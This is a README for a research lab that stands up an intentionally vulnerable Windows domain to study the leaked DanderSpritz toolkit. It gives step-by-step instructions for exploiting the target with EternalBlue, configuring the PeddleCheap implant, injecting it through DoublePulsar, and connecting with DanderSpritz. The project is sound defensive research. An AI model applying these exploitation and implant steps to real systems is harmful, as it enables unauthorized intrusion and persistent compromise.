Home

Awesome

DanderSpritz Lab

Purpose

The goal of DanderSpritz lab is to allow researchers and defenders to quickly stand up a fully functional version of DanderSpritz - The Equation Group's Post exploitation tool-set and a Windows Server 2008 Domain and client as targets. The Windows target have some reverse engineering tools that I found useful while investigating DanderSpritz and it's capabilities.

Read a little bit about DanderSpritz lab here: https://medium.com/@francisck/introducing-danderspritz-lab-461912313d7c

A website I've created to document DanderSpritz capabilities and tools: https://danderspritz.com

NOTE: This lab has not been hardened in any way (it is intentionally vulnerable) and runs with default vagrant credentials. Please do not connect or bridge it to any networks you care about.

Requirements


Starting DanderSpritz Lab

DanderSpritz uses Packer, Vagrant, and the Vagrant-reload plug-in to install and configure the lab from scratch. Packer will download Windows ISOs directly from Microsoft and install trial versions of the software for use during research.

  1. Clone this repo to your own machine git clone git@github.com:francisck/DanderSpritz_lab.git
  2. Make sure you have the Vagrant-reload plug installed vagrant plugin install vagrant-reload
  3. In order to download the ISOs and perform the build-out of the Vagrant boxes run the following command: packer build danderspritz_lab.json
  4. Once the Vagrant boxes are built, start the VMs and let them continue some additional configuration: vagrant up

Create a FuzzBunch project

  1. Launch the Windows Command Prompt (cmd) and run the following: D:\ python fb.py
  2. Set a default target address of 192.168.40.3
  3. Set a default callback address of 192.168.40.4
  4. Do not use redirection (at first)
  5. Leave the default log directory
  6. Create a new project (option 0)
  7. Name your new project
  8. Leave the default logs directory

FuzzBunch project

Exploit the Target Machine

  1. Run the following command to exploit the machine using EternalBlue use eternalblue
  2. Choose all of the default options except the delivery mechanism. Use "FB" (traditional deployment) as the delivery mechanism
  3. Once eternalblue succeeds, configure danderspritz and peddlecheap

Configure & Launch DanderSpritz

  1. Launch another Windows Command Prompt (cmd) and run the following: D:\ python configure_lp
  2. Allow Java through the firewall
  3. Select browse next to "Log directory" and choose the name of the FuzzBunch project you created Logs Directory
  4. Click "go"

PeddleCheap prep (configure the implant)

  1. In the DanderSpritz console, run the following command: pc_prep
  2. Select the standard x64-winnt level 3 sharedlib payload 5
  3. Do not select advanced settings
  4. Choose to perform an immediate callback
  5. Use the default PC ID (0)
  6. Select "Yes" to "Do you want to listen?"
  7. Do not change listen ports
  8. Leave the default "callback" address (127.0.0.1)
  9. Do not change the exe name
  10. Use the default key (option 2)
  11. Validate that the PeddleCheap configuration is valid
  12. Do not configure with FC (felonycrowbar)
  13. Copy the location of the configured binary: PeddleCheap Binary

Deliver the implant (peddlecheap) via DoublePulsar backdoor:

  1. In the original Fuzzbunch Window type: use doublepulsar
  2. Choose "yes" when asked if you want to be prompted for variable settings
  3. Select all default variable settings except the target architecture (choose option 1) 1) x64 x64 64-bits
  4. Select the "RunDLL" function (option 2) 2) RunDLL Use an APC to inject a DLL into a user mode process. DoublePulsar Config
  5. Leave all other options default and select "Yes" when asked if you want to execute the plugin
  6. You should see "Doublepulsar succeeded"

Connect to PeddleCheap implant with DanderSpritz

  1. In DanderSpritz select "PeddleCheap" at the top of the screen
  2. Select the "default" key from the key dropdown menu
  3. Enter the address of the target machine (192.168.40.3)
  4. Select "Connect to target" PeddleCheap connect
  5. Select your Fuzzbunch project name
  6. Wait for the DanderSpritz Survey to complete (will take quite a while) and you'll have to answer a few questions along the way
  7. Profit!

Use for good, not evil!

The purpose of this project is to allow security researchers to build and configure a fully functional DanderSpritz lab easily for reverse engineering and testing.

Day-to-day usage

Once you've ran packer once, you won't need to run it again. The Vagrant boxes will be available for you to rebuild, tear down, restart your lab.

Below are some useful commands that you may use as you work with the lab:

Basic Vagrant Usage

Re-arm expired Windows hosts

If you run into an issue where the test license is expired, you can re-arm the hosts up to 3 times (for 90 days of Windows license goodness) by running this command on an administrative command prompt

`slmgr /rearm'

You'll have to reboot the machine.


Lab Information

Lab Diagram

DanderSpritz Lab Diagram

Additional lab Information

Lab Hosts

Installed Tools on Target (Windows 7 SP1)


Credits/Resources

A sizable percentage of this code was borrowed and adapted from Chris Long's DetectionLab project along with Stefan Scherer's packer-windows and adfs2 Github repos. A huge thanks to to everyone who has contributed their code to making projects like this easier (or even possible).

Acknowledgements